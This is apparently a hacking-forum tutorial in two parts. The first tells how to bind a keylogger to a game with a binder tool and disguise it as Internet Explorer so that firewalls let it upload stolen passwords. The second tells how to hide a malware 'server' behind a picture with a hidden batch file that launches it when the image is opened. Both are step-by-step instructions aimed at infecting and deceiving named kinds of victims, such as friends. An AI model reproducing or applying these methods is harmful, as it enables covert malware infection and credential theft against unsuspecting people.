DO NOT use minor binding tools like FreshBind or alike. Many of these makes the output detectable..
USE nBinder PRO, nBinder only makes it slightly more detectable.
 
Once you have nBinder PRO its time to make the keylogger EXE.
you do that in file >> make project.EXE (Save as Internet Explorer.exe, will explain..)
when the EXE is created its time to find a file (prefferably a game or alike) to bind it with.

Open Up nBINDER PRO.
add the keylogger and the file to be bound with.
Right click the Keylogger (inside nBINDER) and select Options.
Tick "Execute" box (if not already ticked) and Tick "Start visible" box (if not already ticked)
Untick "Delete file at next boot" if you want the keylogger to stay in the file after first boot.
now select options on the other file.
IMPORTANT: tick EXECUTE and "START VISIBLE" here.
UNtick delete at next boot.
now select iconfile and output name, compress the file.
Almost done now.

The reason it should be called Internet Explorer.exe and have Internet explorer icon (and copy as internet explorer.exe for that matter) is because some firewalls detects the FTP file uploading. and when the time comes when firewall asks if you want to allow the program internet connection, it will ask: Internet explorer is trying to access the internet . Block / Remove Block. and display Internet Explorer icon. That way it looks like its just IE that tries to get to the internet.. you can use other browsers for this aswell.. or messenger etc.

Now my friend. when the file is executed. The game (or w/e) will launch immediately. when the game is exited the keylogger starts logging invisible. (and is copied to startup / added a regkey) The victim shouldnt notice a thing.
and very soon you will be the owner of their passwords =).

Thats it for This TUTORIAL for keylogging.
 

Infect Victim with Pixs

Okay now in this tutorial I will show you how one may spread their virus with pictures, and no binder whatsoever.
It can easily be found by someone with decent knowledge of pc's so be weary of using this method and don't use it for mass spreading, however it works wonderfully when you have a friend or someone that you might personally know which you want to open your servers.


Step 1.
Go to your desktop or commonly known place and make a new folder. Simple right? Right...

step 2.
Add your server to that folder and name it whatever that you would like it to be called. It doesn't really matter what you call it because as long as the person doesn't get suspicious of you, they are not going to see that your server lies in this folder.

step 3.
Decide which picture that you'd like to open your virus when its looked @. This shouldn't be too hard, you probably have an idea of what your victim likes and what pics they would open in the first place.
For my example I will be using a picture that means nothing for anyone and simply states that "you have been hacked" as an example.

step 4.
Go to the folder in which you've put your picture and your server and open a new notepad document.
We are going to write a .bat (batch) file into this notepad document. If you know how a start command is written in batch do so now as that is what we are doing, if not read below...
First type
"@echo off."

next line type "@start"

space ON THAT LINE, then type the name of your server.
In this example it is "fakeserver.exe"

Space one additional space from that and on the same line put in quotations "C:\Documents and Settings\current

user\Desktop\"your folder"

hit enter to go to a new line and type "@end" after your opening path.

Save as "whatever".bat all that matters is that we name this file with the extension of ".bat" after you name it...



Step 5.
Go to the folder that you've created for this project and right click your mouse cursor onto the picture that you are using to host your server.

Select "properties" @ the very bottom of this list.
Under properties screen there should be a bar that says
type of file: jpeg image
opens with : unknown application

next to the "open with" line there should be a button which says "change", hit this button and select the .bat file that you created. Hit ok and then go to the bottom of the properties screen and select "apply"

What this does is makes your batch file run whenever your picture is clicked on... that batch file then executes your server on the victims machine...

step6.
Right click both your server and your batch file and select, "hidden" and hit the apply button.
Now they cant be seen unless the person shows hidden files on their system or uses the search feature and when the pic is opened it will run your server as you made it to do!

and now for a quick recap of the steps with pics...

server and pic both in folder

creating the .bat file to start server....


setting your pic to open with the .bat file


showing how to set the pic to run with .bat


showing how to hide both server and .bat file from common eyes.


notice it appears that there is only one pic in the folder?


but there are really 3 files there..


Optionally, If your victim is a rather suspicious person and will go snooping when no picture opens for them, add another start command to your bat leading to a copy of the picture that is hidden as well.
So now you know the way that I may or may not infect victims with pictures(or other files of choosing really). If you have a spin of this or adaptation with your own methods to improve this one, feel free to add it.